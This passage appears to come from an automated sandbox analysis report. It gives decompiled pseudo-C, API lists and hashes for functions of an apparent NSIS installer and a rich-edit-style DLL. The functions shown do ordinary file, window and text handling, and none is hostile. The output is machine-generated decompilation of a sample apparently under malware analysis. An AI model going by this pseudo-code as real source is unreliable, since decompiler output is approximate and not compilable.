						_t35 = E1000D770( *((intOrPtr*)(_t54 + 0x14)), "{\\urtf", 6);
						_t69 = _t69 + 0xc;
						if(_t35 != 0) {
							E1000B820( *((intOrPtr*)(_t54 + 8)),  *((intOrPtr*)(_t54 + 0x14)),  *((intOrPtr*)(_t54 + 0x18)));
						} else {
							goto L3;
						}
					}
				}
				0x10000000( *((intOrPtr*)(_t54 + 8)), _t54 - 0x2c4);
				E100072F0( *((intOrPtr*)(_t54 + 8)), _t54 - 0x2c4, 0x7fffffff);
				0x10000000( *((intOrPtr*)(_t54 + 8)), 0, 0);
				 *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x58)) = 0;
				0x10000000( *((intOrPtr*)(_t54 + 8)));
				0x10000000( *((intOrPtr*)(_t54 + 8)));
				0x10000000( *((intOrPtr*)(_t54 + 8)), 0);
				return 1;
			}










                                      0x10002b2a
                                      0x10002b2e
                                      0x10002b3c
                                      0x10002b50
                                      0x10002b55
                                      0x10002b5c
                                      0x10002bcc
                                      0x10002b5e
                                      0x10002b67
                                      0x10002b7a
                                      0x10002b7f
                                      0x10002b84
                                      0x10002b9d
                                      0x10002ba7
                                      0x10002b86
                                      0x10002b91
                                      0x10002b96
                                      0x10002b9b
                                      0x10002bbd
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x10002b9b
                                      0x10002bc5
                                      0x10002bdf
                                      0x10002bf7
                                      0x10002c07
                                      0x10002c12
                                      0x10002c1d
                                      0x10002c29
                                      0x10002c37
                                      0x10004b6f

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: _strncmp
                                      • String ID: WM_SETTEXT - NULL$WM_SETTEXT lParam==%lx${\rtf${\urtf
                                      • API String ID: 909875538-1399149447
                                      • Opcode ID: c7d85a95bf14aa92e9469dade82ba589ee1669f8c7f3cc33b3f456d1b268c6ae
                                      • Instruction ID: b35da799011eca8f7549aa62ffda524a41c5db23983b350d5bf49e9afa470f29
                                      • Opcode Fuzzy Hash: c7d85a95bf14aa92e9469dade82ba589ee1669f8c7f3cc33b3f456d1b268c6ae
                                      • Instruction Fuzzy Hash: CD315EFA90020477EB10EE60EC42F9F3369DB58285F008514FE085B28AF671FA548BE2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040266E, Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 86%
                                      			E0040266E(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *(_t58 - 8) = 0xfffffd66;
				_t52 = E004029E8(0xfffffff0);
				 *(_t58 - 0x44) = _t24;
				if(E0040548B(_t52) == 0) {
					E004029E8(0xffffffed);
				}
				E004055E3(_t52);
				_t27 = E00405602(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x42eb74; // 0x8200
					 *(_t58 - 0x2c) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E00403098(_t47);
						E00403066(_t51,  *(_t58 - 0x2c));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
						 *(_t58 - 0x30) = _t56;
						if(_t56 != _t47) {
							E00402E44( *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x38) =  *_t56;
								E004055C3( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x38);
							}
							GlobalFree( *(_t58 - 0x30));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
						GlobalFree(_t51);
						 *(_t58 - 8) = E00402E44(0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *(_t58 - 8) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x44));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}











                                      0x0040266e
                                      0x00402670
                                      0x0040267c
                                      0x0040267f
                                      0x00402689
                                      0x0040268d
                                      0x0040268d
                                      0x00402693
                                      0x004026a0
                                      0x004026a8
                                      0x004026ab
                                      0x004026b1
                                      0x004026bf
                                      0x004026c4
                                      0x004026c8
                                      0x004026cb
                                      0x004026d4
                                      0x004026e0
                                      0x004026e4
                                      0x004026e7
                                      0x004026f1
                                      0x00402710
                                      0x004026f8
                                      0x004026fd
                                      0x00402705
                                      0x00402708
                                      0x0040270d
                                      0x0040270d
                                      0x00402717
                                      0x00402717
                                      0x00402729
                                      0x00402730
                                      0x00402742
                                      0x00402742
                                      0x00402748
                                      0x00402748
                                      0x00402753
                                      0x00402754
                                      0x00402758
                                      0x0040275c
                                      0x00402762
                                      0x00402762
                                      0x00402769
                                      0x00402156
                                      0x00402880
                                      0x0040288c

                                      APIs
                                      • GlobalAlloc.KERNEL32(00000040,00008200,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026C2
                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026DE
                                      • GlobalFree.KERNEL32 ref: 00402717
                                      • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402729
                                      • GlobalFree.KERNEL32 ref: 00402730
                                      • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402748
                                      • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040275C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                      • String ID:
                                      • API String ID: 3294113728-0
                                      • Opcode ID: 1fe56166fb6cd4dbd5b8f8a47f0c0769986a224b60575e965902ed59b0249d4b
                                      • Instruction ID: 8136da2242d6e6cba5f284f27b64b1989b358de0d737458f3662c87ad7b72ced
                                      • Opcode Fuzzy Hash: 1fe56166fb6cd4dbd5b8f8a47f0c0769986a224b60575e965902ed59b0249d4b
                                      • Instruction Fuzzy Hash: 4A318B71C00128BBDF216FA9CD49DAE7E79EF05324F10822AF520762E0C7795D419BA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00404CC9, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00404CC9(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42e344; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x42ec14; // 0x0
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E0040594D(0, _t39, 0x4297b0, 0x4297b0, _a4);
					}
					_t26 = lstrlenA(0x4297b0);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x42e328, 0x4297b0);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x4297b0;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x4297b0)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x4297b0, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                      0x00404ccf
                                      0x00404cdb
                                      0x00404cde
                                      0x00404ce4
                                      0x00404cf0
                                      0x00404cf3
                                      0x00404cf6
                                      0x00404cfc
                                      0x00404cfc
                                      0x00404d02
                                      0x00404d0a
                                      0x00404d0d
                                      0x00404d2a
                                      0x00404d2e
                                      0x00404d37
                                      0x00404d37
                                      0x00404d41
                                      0x00404d4a
                                      0x00404d56
                                      0x00404d5d
                                      0x00404d61
                                      0x00404d64
                                      0x00404d77
                                      0x00404d85
                                      0x00404d85
                                      0x00404d89
                                      0x00404d8b
                                      0x00404d8e
                                      0x00000000
                                      0x00404d8e
                                      0x00404d0f
                                      0x00404d17
                                      0x00404d1f
                                      0x00404d25
                                      0x00000000
                                      0x00404d25
                                      0x00404d1f
                                      0x00404d0d
                                      0x00404d98

                                      APIs
                                      • lstrlenA.KERNEL32(004297B0,00000000,0041A90C,74E5EA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000,?), ref: 00404D02
                                      • lstrlenA.KERNEL32(00402F9F,004297B0,00000000,0041A90C,74E5EA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000), ref: 00404D12
                                      • lstrcatA.KERNEL32(004297B0,00402F9F,00402F9F,004297B0,00000000,0041A90C,74E5EA30), ref: 00404D25
                                      • SetWindowTextA.USER32(004297B0,004297B0), ref: 00404D37
                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404D5D
                                      • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404D77
                                      • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404D85
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                      • String ID:
                                      • API String ID: 2531174081-0
                                      • Opcode ID: 259a6bfffd9455f75c7f37c98e6fd5d39197061d1bb8cf0c94f6c9d48c0e4d13
                                      • Instruction ID: 8ccdf1774425cd87f0729cbca42791fc67af6cd1557da5970d5077929bdf2610
                                      • Opcode Fuzzy Hash: 259a6bfffd9455f75c7f37c98e6fd5d39197061d1bb8cf0c94f6c9d48c0e4d13
                                      • Instruction Fuzzy Hash: 17215EB1900158BBDF119FA5CD80A9EBFB9EF44364F14807AF944A6291C7394E41DF98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00404598, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00404598(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                      0x004045a6
                                      0x004045b3
                                      0x004045b9
                                      0x004045f7
                                      0x004045f7
                                      0x00404606
                                      0x0040460d
                                      0x00000000
                                      0x0040460f
                                      0x004045bb
                                      0x004045ca
                                      0x004045d2
                                      0x004045d5
                                      0x004045e7
                                      0x004045ed
                                      0x004045f4
                                      0x00000000
                                      0x004045f4
                                      0x00000000

                                      APIs
                                      • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004045B3
                                      • GetMessagePos.USER32 ref: 004045BB
                                      • ScreenToClient.USER32 ref: 004045D5
                                      • SendMessageA.USER32(?,00001111,00000000,?), ref: 004045E7
                                      • SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040460D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Message$Send$ClientScreen
                                      • String ID: f
                                      • API String ID: 41195575-1993550816
                                      • Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                      • Instruction ID: 6b317f608504f5286e083177801d0cb87e447db18072776417f46e2e8b339eff
                                      • Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                      • Instruction Fuzzy Hash: 5C014C71D00219BADB00DBA4DC85BEEBBB8AF59711F10016ABB00B61D0D7B8A9458BA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00402B2D, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00402B2D(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x414b78; // 0x4dbff
					_t11 =  *0x428b88; // 0x4dc03
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                      0x00402b3a
                                      0x00402b48
                                      0x00402b4e
                                      0x00402b4e
                                      0x00402b5c
                                      0x00402b5e
                                      0x00402b64
                                      0x00402b6b
                                      0x00402b6d
                                      0x00402b6d
                                      0x00402b83
                                      0x00402b93
                                      0x00402ba5
                                      0x00402ba5
                                      0x00402bad

                                      APIs
                                      Strings
                                      • verifying installer: %d%%, xrefs: 00402B7D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Text$ItemTimerWindowwsprintf
                                      • String ID: verifying installer: %d%%
                                      • API String ID: 1451636040-82062127
                                      • Opcode ID: 821183565d5cfc23d2a1d69bdf9aca7d49efffeabee144d451769c9d9fec15d5
                                      • Instruction ID: d97cc89adede162bb954025147407c84299f45570db21cfab8362f7584a841fe
                                      • Opcode Fuzzy Hash: 821183565d5cfc23d2a1d69bdf9aca7d49efffeabee144d451769c9d9fec15d5
                                      • Instruction Fuzzy Hash: 25014470A00209BBEB219F60DD09FAE3779AB04305F008039FA06A92D0D7B9A9518B59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 10004668, Relevance: 9.1, APIs: 6, Instructions: 108memoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 28%
                                      			E10004668() {
				intOrPtr _t41;
				signed int _t46;
				void* _t85;
				void* _t87;
				void* _t90;

				_t41 =  *((intOrPtr*)( *((intOrPtr*)(_t85 + 8)) + 0x18));
				0x10000000( *((intOrPtr*)(_t85 + 8)), _t41);
				 *((intOrPtr*)(_t85 - 0xf8)) = _t41;
				0x10000000( *((intOrPtr*)(_t85 + 8)));
				0x10000000( *((intOrPtr*)(_t85 + 8)),  *((intOrPtr*)(_t85 - 0xf8)));
				_t90 = _t87 + 0x14;
				if(( *(_t85 + 0x14) & 0x00000808) != 0) {
					 *(_t85 - 0x80) = 0;
					_t46 =  *(_t85 + 0x14) & 0x00000800;
					 *(_t85 - 0x84) = _t46;
					if(_t46 == 0) {
						 *(_t85 - 0x84) = 8;
					}
					L1000CDE2();
					 *(_t85 - 0x88) = _t46;
					 *(_t85 - 0x80) = HeapAlloc(GetProcessHeap(), 0,  *(_t85 - 0x88) + 2);
					L1000CDE2();
					 *((short*)( *(_t85 - 0x80) + ( *(_t85 - 0x88) >> 1) * 2)) = 0;
					0x10000000( *((intOrPtr*)(_t85 + 8)), 0,  *(_t85 - 0x80),  *(_t85 - 0x88) >> 1,  *((intOrPtr*)(_t85 - 0xf8)),  *((intOrPtr*)(_t85 - 0x270)),  *(_t85 - 0x84),  *(_t85 - 0x80),  *(_t85 - 0x88),  *((intOrPtr*)(_t85 - 0x270)),  *(_t85 - 0x84), 0, 0);
					_t90 = _t90 + 0x14;
					HeapFree(GetProcessHeap(), 0,  *(_t85 - 0x80));
					if( *(_t85 - 0x84) == 8) {
						0x10000000( *((intOrPtr*)(_t85 + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t85 + 8)) + 0x4e0)), ( *(_t85 - 0x88) >> 1) +  *((intOrPtr*)( *((intOrPtr*)(_t85 + 8)) + 0x4e0)));
						_t90 = _t90 + 0xc;
					}
				}
				0x10000000( *((intOrPtr*)(_t85 - 0xf8)));
				0x10000000( *((intOrPtr*)(_t85 + 8)));
				0x10000000( *((intOrPtr*)(_t85 + 8)), 0);
				return 0;
			}








                                      0x1000466b
                                      0x10004673
                                      0x1000467b
                                      0x10004685
                                      0x10004698
                                      0x1000469d
                                      0x100046a9
                                      0x100046af
                                      0x100046b9
                                      0x100046be
                                      0x100046c4
                                      0x100046c6
                                      0x100046c6
                                      0x100046e2
                                      0x100046e7
                                      0x10004706
                                      0x10004722
                                      0x10004734
                                      0x10004752
                                      0x10004757
                                      0x10004767
                                      0x10004774
                                      0x10004796
                                      0x1000479b
                                      0x1000479b
                                      0x10004774
                                      0x100047a5
                                      0x100047b1
                                      0x100047bf
                                      0x10004b6f

                                      APIs
                                      • ImmGetCompositionStringW.IMM32(?,?,00000000,00000000), ref: 100046E2
                                      • GetProcessHeap.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 100046F9
                                      • HeapAlloc.KERNEL32(00000000), ref: 10004700
                                      • ImmGetCompositionStringW.IMM32(?,?,00000000,?), ref: 10004722
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 10004760
                                      • HeapFree.KERNEL32(00000000), ref: 10004767
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Heap$CompositionProcessString$AllocFree
                                      • String ID:
                                      • API String ID: 3640976095-0
                                      • Opcode ID: b1b4d3975558b6066708ca6621c5112ae93d07b96238865b8b2726c77865d032
                                      • Instruction ID: 4dc1c711058abb7fc8230343caff3a2d3d6c24b15223c6720afbb711c7ad73a3
                                      • Opcode Fuzzy Hash: b1b4d3975558b6066708ca6621c5112ae93d07b96238865b8b2726c77865d032
                                      • Instruction Fuzzy Hash: 18411BB9A00119ABDB54CF58DC81FAE77B9FB48345F148198F60DDB245DE31EA84CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 100078B0, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 208comCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OleCreateDefaultHandler.OLE32(1001A494,00000000,1001A4D4,00000000), ref: 10007980
                                      • MulDiv.KERNEL32(00000000,000000FE,00000090), ref: 10007ABA
                                      • MulDiv.KERNEL32(?,000000FE,00000090), ref: 10007AD4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: CreateDefaultHandler
                                      • String ID: 8$@
                                      • API String ID: 1257578756-1376636172
                                      • Opcode ID: 7a3b79c0e2312fe20d17e9f24af6cca43c386ca3d495e51ceb3ad63718040445
                                      • Instruction ID: ab3a0b6daa896ca24c6f493cb1a0a865ab882a305c9ca913fd8cc42643f58313
                                      • Opcode Fuzzy Hash: 7a3b79c0e2312fe20d17e9f24af6cca43c386ca3d495e51ceb3ad63718040445
                                      • Instruction Fuzzy Hash: DE814FB9D00209ABEB14CF94D845BEEB7B4FF44384F108158F909AB285E779EA44CF91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 10002FA9, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 170COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 16%
                                      			E10002FA9() {
				intOrPtr _t93;
				void* _t98;
				short* _t105;
				intOrPtr _t109;
				void* _t149;
				void* _t151;
				void* _t153;
				void* _t155;

				 *(_t149 - 0xa0) =  *( *(_t149 + 0x14)) & 0x0000ffff;
				 *(_t149 - 0x14) =  *(_t149 - 0xa0);
				 *(_t149 - 0x4c) =  *(_t149 + 0x14);
				 *(_t149 - 0x198) = 0;
				if( *((intOrPtr*)(_t149 + 0x18)) == 0) {
					 *(_t149 - 0x17c) = "Ansi";
				} else {
					 *(_t149 - 0x17c) = "Unicode";
				}
				0x10000000("EM_GETLINE: row=%d, nMaxChars=%d (%s)\n",  *((intOrPtr*)(_t149 + 0x10)),  *(_t149 - 0xa0),  *(_t149 - 0x17c));
				_t93 =  *((intOrPtr*)(_t149 + 0x10));
				0x10000000( *((intOrPtr*)(_t149 + 8)), _t93);
				_t153 = _t151 + 0x18;
				 *((intOrPtr*)(_t149 - 0x9c)) = _t93;
				if( *((intOrPtr*)(_t149 - 0x9c)) != 0) {
					0x10000000( *((intOrPtr*)(_t149 - 0x9c)), _t149 - 0x2d0);
					0x10000000( *((intOrPtr*)(_t149 - 0x9c)), _t149 - 0x2dc, 1);
					_t155 = _t153 + 0x14;
					 *((intOrPtr*)(_t149 - 0x34)) =  *((intOrPtr*)(_t149 - 0x2cc));
					while( *(_t149 - 0x14) != 0) {
						if( *((intOrPtr*)(_t149 - 0x34)) !=  *((intOrPtr*)(_t149 - 0x2cc))) {
							 *(_t149 - 0x180) = 0;
						} else {
							 *(_t149 - 0x180) =  *(_t149 - 0x2c8);
						}
						 *(_t149 - 0x264) =  *(_t149 - 0x180);
						if( *((intOrPtr*)(_t149 - 0x34)) !=  *((intOrPtr*)(_t149 - 0x2d8))) {
							 *(_t149 - 0x184) =  *( *((intOrPtr*)(_t149 - 0x34)) + 0xc);
						} else {
							 *(_t149 - 0x184) =  *(_t149 - 0x2d4);
						}
						 *(_t149 - 0x188) =  *(_t149 - 0x184);
						_t105 = E10001000( *((intOrPtr*)(_t149 - 0x34)),  *(_t149 - 0x264));
						_t155 = _t155 + 8;
						 *(_t149 - 0x190) = _t105;
						if( *(_t149 - 0x14) >=  *(_t149 - 0x188)) {
							 *(_t149 - 0x18c) =  *(_t149 - 0x188);
						} else {
							 *(_t149 - 0x18c) =  *(_t149 - 0x14);
						}
						 *(_t149 - 0x7c) =  *(_t149 - 0x18c);
						if( *((intOrPtr*)(_t149 + 0x18)) == 0) {
							 *(_t149 - 0x7c) = WideCharToMultiByte(0, 0,  *(_t149 - 0x190),  *(_t149 - 0x7c),  *(_t149 - 0x4c),  *(_t149 - 0x14), 0, 0);
						} else {
							E1000F6E0( *(_t149 - 0x4c),  *(_t149 - 0x190),  *(_t149 - 0x7c) << 1);
							_t155 = _t155 + 0xc;
						}
						if( *((intOrPtr*)(_t149 + 0x18)) == 0) {
							 *(_t149 - 0x194) = 1;
						} else {
							 *(_t149 - 0x194) = 2;
						}
						 *(_t149 - 0x4c) =  *(_t149 - 0x4c) +  *(_t149 - 0x7c) *  *(_t149 - 0x194);
						 *(_t149 - 0x14) =  *(_t149 - 0x14) -  *(_t149 - 0x7c);
						_t109 =  *((intOrPtr*)(_t149 - 0x34));
						if(_t109 !=  *((intOrPtr*)(_t149 - 0x2d8))) {
							0x10000000( *((intOrPtr*)(_t149 - 0x9c)),  *((intOrPtr*)(_t149 - 0x34)));
							_t155 = _t155 + 8;
							 *((intOrPtr*)(_t149 - 0x34)) = _t109;
							continue;
						} else {
						}
						break;
					}
					if( *(_t149 - 0x14) > 0) {
						if( *((intOrPtr*)(_t149 + 0x18)) == 0) {
							 *( *(_t149 - 0x4c)) = 0;
						} else {
							 *( *(_t149 - 0x4c)) = 0;
						}
						 *(_t149 - 0x14) =  *(_t149 - 0x14) - 1;
						 *(_t149 - 0x198) = 1;
					}
					0x10000000("EM_GETLINE: got %u characters\n",  *(_t149 - 0xa0) -  *(_t149 - 0x14));
					if( *(_t149 - 0x198) == 0) {
						 *(_t149 - 0x19c) = 0;
					} else {
						 *(_t149 - 0x19c) = 1;
					}
					_t98 =  *(_t149 - 0xa0) -  *(_t149 - 0x14) -  *(_t149 - 0x19c);
				} else {
					_t98 = 0;
				}
				return _t98;
			}











                                      0x10002faf
                                      0x10002fbb
                                      0x10002fc1
                                      0x10002fc4
                                      0x10002fd2
                                      0x10002fe0
                                      0x10002fd4
                                      0x10002fd4
                                      0x10002fd4
                                      0x10003001
                                      0x10003009
                                      0x10003011
                                      0x10003016
                                      0x10003019
                                      0x10003026
                                      0x1000303d
                                      0x10003055
                                      0x1000305a
                                      0x10003063
                                      0x10003066
                                      0x10003079
                                      0x10003089
                                      0x1000307b
                                      0x10003081
                                      0x10003081
                                      0x10003099
                                      0x100030a8
                                      0x100030be
                                      0x100030aa
                                      0x100030b0
                                      0x100030b0
                                      0x100030ca
                                      0x100030db
                                      0x100030e0
                                      0x100030e3
                                      0x100030f2
                                      0x10003105
                                      0x100030f4
                                      0x100030f7
                                      0x100030f7
                                      0x10003111
                                      0x10003118
                                      0x10003156
                                      0x1000311a
                                      0x1000312b
                                      0x10003130
                                      0x10003130
                                      0x1000315d
                                      0x1000316b
                                      0x1000315f
                                      0x1000315f
                                      0x1000315f
                                      0x10003182
                                      0x1000318b
                                      0x1000318e
                                      0x10003197
                                      0x100031a6
                                      0x100031ab
                                      0x100031ae
                                      0x00000000
                                      0x00000000
